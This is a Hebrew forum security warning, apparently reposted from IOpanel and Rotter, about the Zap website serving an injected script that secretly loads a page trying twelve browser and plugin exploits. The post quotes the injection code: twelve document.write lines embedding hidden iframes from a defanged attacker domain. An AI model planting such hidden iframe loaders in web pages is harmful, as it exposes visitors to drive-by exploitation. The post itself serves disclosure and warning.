ראו הוזהרתם !!!! לא להכנס לזאפ עד שלא יוסר הסקריפט הנ"ל.
תודה לליאור מאתר IOpanel.כחלק מעזרי JAVA באתר זאפ מופעל הסקריפט:
[SIZE=-1]http://www.nmidahena.com1/1.js[/SIZE]
הסריפט הזה פותח בצורה סמויה את הדף:
[SIZE=-1]http://www.nmidahena.com1/1.html[/SIZE]
והדף הנל מנסה לנצל 12 !!! 12 אקספלויטים שונים על דפדפן הקורבן,הרשימה:
document.write("<iframe width=""5"" height=""5"" src=""[SIZE=-1]http://www.nmidahena.com1/Real.htm""/iframe>")
document.write("<iframe width=""5"" height=""5"" src=""[size=-1]http://www.nmidahena.com1/yaho.html""[/size]
document.write("<iframe width=""5"" height=""5"" src=""[size=-1]http://www.nmidahena.com1/QVod.htm""[/size]
document.write("<iframe width=""5"" height=""5"" src=""[size=-1]http://www.nmidahena.com1/Bfyy.htm""[/size]
document.write("<iframe width=""5"" height=""5"" src=""[size=-1]http://www.nmidahena.com1/Lz.htm""[/size]
document.write("<iframe width=""5"" height=""5"" src=""[size=-1]http://www.nmidahena.com1/Pps.htm""[/size]
document.write("<iframe width=""5"" height=""5"" src=""[size=-1]http://www.nmidahena.com1/XunLei.htm""[/size]
document.write("<iframe width=""0"" height=""0"" src=""[size=-1]http://www.nmidahena.com1/Ajax.htm""[/size]
document.write("<iframe width=""5"" height=""5"" src=""[SIZE=-1]http://www.nmidahena.com1/Ms07055.htm""
document.write("<iframe width=""5"" height=""5"" src=""[size=-1]http://www.nmidahena.com1/Ms07033.htm""[/size]
document.write("<iframe width=""5"" height=""5"" src=""[size=-1]http://www.nmidahena.com1/Ms07004.htm""[/size]
document.write("<iframe width=""0"" height=""0"" src=""[SIZE=-1]http://www.nmidahena.com1/Ms06014.htm""
8 האקספלויטים הראשונים מנסים לנצל חורים בעזרים מותקנים בדפדפן,כמו סרגל YAHOO, מודל של הנגן REAL PLAYER וכדומה
4האקספלויטים האחרים הם לחורים מוכרים בדפדפן IE עצמו, שימו לב שהשמות כגוןMs07055 מצויינים אפילו את מספר דוח האבטחה של Microsoft,ה SecurityBulletin.
הוספתי בכתובת 1 לסיומת ה COM כדי שאף אחד לא יכנס בטעות.
ראו הוזהרתם !!!! לא להכנס לזאפ עד שלא יוסר הסקריפט הנ"ל.
מקור: IOpanel,Rotter
